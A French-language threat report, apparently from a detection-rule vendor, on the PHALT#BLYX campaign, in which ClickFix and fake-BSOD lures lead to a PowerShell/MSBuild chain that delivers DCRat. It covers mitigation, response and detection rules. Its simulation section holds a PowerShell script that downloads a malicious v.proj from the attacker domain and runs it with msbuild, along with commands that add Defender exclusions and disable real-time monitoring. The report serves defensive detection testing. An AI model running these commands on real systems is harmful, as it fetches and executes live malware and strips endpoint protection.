Analyse de PHALT#BLYX : faux BSOD et outils de construction de confiance dans les chaînes de logiciels malveillants
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Le rapport détaille une chaîne d’intrusion multi-étapes affectant le secteur de l’hôtellerie qui combine une fausse page d’accueil Booking.com, une animation trompeuse de type écran bleu, et un message à la ClickFix pour persuader les utilisateurs d’exécuter un dropper PowerShell. Ce dropper récupère un fichier projet MSBuild, qui exécute un chargeur DCRat sur mesure. Le chargeur altère Windows Defender, établit une persistance en utilisant un raccourci de démarrage .url, et injecte sa charge utile dans des processus légitimes. En s’appuyant sur des utilitaires « living-off-the-land » comme PowerShell et MSBuild.exe, les opérateurs réduisent les traces évidentes de logiciels malveillants. Des artefacts en langue russe dans la chaîne sont également notés comme un indice d’attribution.
Enquête
Les chercheurs de Securonix ont cartographié le flux depuis les emails de phishing offrant des liens de « résiliation de réservation » vers un domaine malveillant, puis vers une ligne de commande PowerShell qui localise msbuild.exe, télécharge un fichier v.proj, et l’exécute. Le projet v.proj effectue plusieurs actions: il ajoute des exclusions Windows Defender, récupère staxs.exe (une variante de DCRat), crée un raccourci de démarrage .url pour la persistance, et se connecte à l’infrastructure de commande et contrôle sur le port 3535. Le chargeur compresse ensuite et injecte l’étape finale dans aspnet_compiler.exe, utilisant un processus d’hollowing pour se fondre dans une activité légitime.
Atténuation
Réduisez l’exposition en formant les utilisateurs à reconnaître les messages de type ClickFix et les ingénieries sociales « exécutez cette commande pour résoudre ». Surveillez et restreignez l’exécution de MSBuild.exe, notamment lorsqu’il est invoqué depuis des chemins inhabituels ou des flux de travail pilotés par l’utilisateur, et activez la journalisation des blocs de script PowerShell pour une meilleure visibilité. Ajoutez des détections pour la création de raccourcis .url dans le dossier de démarrage et pour les modifications des exclusions de Windows Defender. Au niveau du réseau, bloquez le trafic sortant vers les domaines malveillants identifiés et interdisez explicitement ou alertez sur les sorties TCP/3535 suspectes là où elles ne sont pas requises.
Réponse
Si une activité est détectée, isolez l’hôte et conservez les artefacts clés, y compris v.proj, staxs.exe, et tout fichier de démarrage .url. Supprimez les exclusions Defender non autorisées, terminez les processus malveillants ou injectés, et bloquez les domaines/IPs associés de commande et contrôle, particulièrement toute communication sur le port 3535. Réinitialisez les identifiants potentiellement exposés, effectuez une analyse complète des logiciels malveillants, et examinez l’environnement pour détecter des exécutions similaires pilotées par MSBuild et des modèles de commandes PowerShell. Enfin, déployez des détections informées par le renseignement sur les menaces qui se concentrent sur les abus de MSBuild, le comportement ClickFix, et la persistance via les raccourcis de démarrage pour prévenir la récurrence.
Flux d’attaque
Détections
Téléchargement ou Téléversement via Powershell (via cmdline)
Voir
Modifications Suspectes des Préférences de Windows Defender (via powershell)
Voir
Points de Persistance Possibles [ASEPs – Hive Software/NTUSER] (via registry_event)
Voir
Binaire/Script Suspect dans l’Emplacement d’Autostart (via file_event)
Voir
IOC (HashSha512) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante
Voir
IOC (SourceIP) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante
Voir
IOC (HashSha256) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante
Voir
IOC (DestinationIP) à détecter : Analyse de PHALT#BLYX : comment les faux BSOD et les outils de construction fiables sont utilisés pour construire une infection malveillante
Voir
Exécution de Charge Utile Malveillante PHALT#BLYX via MSBuild et Process Hollowing [Création de Processus Windows]
Voir
Campagne de Logiciel Malveillant PHALT#BLYX Utilisant PowerShell et MSBuild pour l’Infection [PowerShell Windows]
Voir
Exécution de Simulation
Condition Préalable : la Vérification de l’Instrumentation et du Baseline doit avoir réussi.
Raison : Cette section détaille l’exécution précise de la technique d’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit reflètent directement les TTPs identifiés et visent à générer la télémétrie exacte attendue par la logique de détection.
-
Narratif & Commandes de l’Attaque :
L’acteur de la menace ouvre une session PowerShell sur un point d’extrémité compromis. Il localise d’abord lemsbuild.exesystème, puis télécharge un projet MSBuild malveillant (v.proj) dansC:ProgramData. L’attaquant invoque immédiatementmsbuild.exepour exécuter la charge utile, qui dépose une deuxième étape. Enfin, il altère Windows Defender en ajoutant des exclusions et en désactivant la surveillance en temps réel pour garantir la persistance. -
Script de Test de Régression :
# Script de simulation PHALT#BLYX – reproduit l'activité déclenchant la détection # -------------------------------------------------------------- # 1. Localiser msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Téléchargez le projet MSBuild malveillant vers ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Exécuter le projet avec msbuild.exe & $msb $dest # 4. Modifier les paramètres de Windows Defender (n'importe lequel des éléments suivants satisfera à la règle) # Décommentez les lignes souhaitées pour simuler les actions de l'attaquant. # Ajouter un chemin d'exclusion # Add-MpPreference -ExclusionPath "$env:ProgramData" # Ajouter une exclusion pour les fichiers .exe # Add-MpPreference -ExclusionExtension ".exe" # Ajouter une exclusion pour les fichiers .ps1 # Add-MpPreference -ExclusionExtension ".ps1" # Désactiver la Surveillance en temps réel # Set-MpPreference -DisableRealtimeMonitoring $true -
Commandes de Nettoyage :
# Supprimez le fichier projet déposé Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Restaurez la Surveillance en temps réel de Windows Defender (si elle a été désactivée) Set-MpPreference -DisableRealtimeMonitoring $false # Supprimez toutes les exclusions ajoutées (exemple pour l'exclusion de chemin) Remove-MpPreference -ExclusionPath "$env:ProgramData" # Supprimez éventuellement tous les fichiers restants créés par la charge utile # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue